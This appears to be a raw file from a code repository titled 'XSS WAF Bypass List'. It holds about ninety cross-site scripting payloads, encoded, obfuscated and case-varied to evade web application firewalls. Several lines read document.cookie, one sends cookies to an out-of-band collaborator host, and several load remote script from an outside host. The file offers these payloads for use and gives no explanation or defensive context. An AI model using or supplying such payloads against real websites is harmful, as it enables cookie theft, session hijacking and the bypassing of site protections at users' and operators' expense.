XSS/XSS WAF Bypass List.txt
2024-09-04 08:59:45 +10:00

92 lines
5.3 KiB
Plaintext
Raw Permalink Blame History

'"><A HRef=\" AutoFocus OnFocus=top/**/?. >
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
%27"><Img Src=OnXSS OnError=alert(1)>
%27"><A%20HRef=\"%20AutoFocus%20OnFocus=top/**/?. >
%27/onerror=alert(1)/%27
/confirm?.(1)/
<img+only=1+src=x+onerror=confirm(1)>
">K=%27><Svg /OnLoad=(confirm)(1)>
%3Cscript%3Evar%20q=`%22`;alert(document.cookie);%3C/script%3E
<meter%20value="2"%20min="0"%20max="10"%20onmouseover="alert(%27XSS%27)">2%20out%20of%2010</meter>
<svg/onload=setInterval(%27al\x65rt(1)%27,5000)>
<img%20src=x%20onerror=alert%281%29>
<!-- --!><script>alert(1)</script>
<script><!--\uFEFF--></script><script>alert(%27BOM%20Injection%27)</script>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
1%27%22%3E%3CImg+Src%3DOnXSS+OnError%3Dalert%28document.cookie%29%3E
1%27"><Img+Src%3DOnXSS+OnError%3Dalert%28document.cookie%29>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
</img+src=x%20oNlY=1%20oNerror=alert(document.cookie)>//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`//>
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<img/src=x onError="`${x}`;alert(`Hello`);">
<img/src/onerror=alert//&NewLine;(2)>
%27"><Img%0ASrc%0A=OnXSS%0AOnError%0A=alert(1)>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=18369/.source))}//\76-->
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=18369/.source))//>
<Script /Src=https://X55.is?1=18369></Script>
%27)/confirm?.(1);function+myObj(){};function+atob(){confirm?.(1)}//
--><K:script xmlns:K="http://www.w3.org/1999/xhtml">confirm?.(1)</K:script>
"'<!--><Img/Src/OnError=(confirm)(1)>"shadowpentesting@gmail.com
}/confirm?.(1)//%5C
;1<%252FScript%252F><Img%252FSrc%252FOnError=confirm%253F%252E(1)>
#Data:,<Img/Src/OnError=(confirm)(1)>
"' OnError=(confirm)(1) <!--><Img Src='
'-confirm?.(1);function+myObj(){}'
confirm?.(1)
;1%2522--%253E%253CSvg%2520O%256ELoad%253Dconfirm%25281%2529%253E/c
;1'-confirm`K`-'
{{$new.constructor('(confirm)(1)')()}}
%27"><Img%0ASrc%0A=OnXSS%0AOnError%0A=alert(1)>
'"<%00!--%00><%00Img/Src/On%00Error=(conf%00irm)(1)>
1'"<<3C>!--<2D>><<3C>Img/Src/On<4F>Error=(conf<6E>irm)(1)>
<img//////src=x oNlY=1 oNerror=alert(document.cookie)(import(/https:\\X55.is?1=18369/.source))//>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is?1=18369/.source))//>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<img src=x onerror=this.src='http://vpoipc5ftc7ghld1eh0p995ssjyam0ap.oastify.com?c='+document.cookie>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
<img src='1' onerror='alert(0)' <
`<svg onload='1`'alert(0'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is?1=18369/.source))//>)'`
%3cscript+%2f*%2500*%2f%3e%2f*%2500*%2falert(1)%2f*%2500*%2f%3c%2fscript+%2f*%2500*%2f
"><body/oNpagEshoW=(confirm)(document.domain)>
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
%27%22%3E%3CImg%20Src=OnXSS%20OnError=alert(1)%3E
")%27--><SvG/oNlOaD=(confirm)(1)<!--"
")%27--><Svg/oNloAd=(co&#x6e;firm)(1)<!--"
")%27--><sVG/oNLoaD=(c&#111;nfirm)(1)<!--"
")%27--><SvG/oNloAd=(&#99;onfirm)(1)<!--"
")%27--><SvG/onLoAD=(con&#x66;irm)(1)<!--"
")%27--><SvG/onLoAD=(&#99;onfirm)(1)<!--"
")%27--><sVg/onload=(confirm)(1)--!>"
")%27--><sVG/onLoad=(confi&#114;m)(1)<!--"
")%27--><sVG/onLoad=(conf&#105;rm)(1)<!--"
")%27--><SvG/onLoad=(confirm)(1)<!--"
")%27--><sVG/onLoad=(confi&#x72;m)(1)<!--"
")%27--><sVG/onload=(co&#110;firm)(1)<!--"
")%27--><sVG/onLoaD=(confirm)(1)--!>"
")%27--><sVG/onLoaD=(co&#110;firm)(1)<!--"
")%27--><sVG/onLoaD=(conf&#105;rm)(1)<!--"
")%27--><SvG/onload=(co&#110;firm)(1)<!--"
")%27--><SvG/onload=(co&#110;firm)(1)--!>"
")%27--><SvG/onLoad=(confirm)(1)--!>"
")%27--><sVG/onLoad=(confirm)(1)--!>"
")%27--><SvG/onLoAd=(confirm)(1)<!--"
")%27--><sVG/onLoaD=(conf&#105;rm)(1)<!--"
")%27--><sVG/onLoaD=(confi&#x72;m)(1)<!--"
")%27--><sVG/onLoad=(confirm)(1)--!>"
")%27--><SvG/onLoad=(conf&#105;rm)(1)--!>"
")%27--><SvG/onLoaD=(co&#110;firm)(1)<!--"
")%27--><sVG/onload=(conf&#105;rm)(1)<!--"
")%27--><sVG/onload=(conf&#105;rm)(1)--!>"
")%27--><SvG/onLoaD=(co&#110;firm)(1)--!>"
")%27--><SvG/onLoad=(confirm)(1)--!>"
")%27--><sVG/onload=(co&#110;firm)(1)<!--"
;1'"><!--><K Data-Spy=scroll Data-Target=&lt;Svg/OnLoad&equals;confirm?.(1)%26gt;%3E
;'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle=(confirm)(1)-->
;1/47/42/55/55/41/76/74Img/40Src/40OnError/75confirm/140/113/140/76
;PDFLTlg8MQ==
<svG/x=">"/oNloaD=confirm()//
<svg onload=alert%26%230000000040"")>
%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%601%60%3E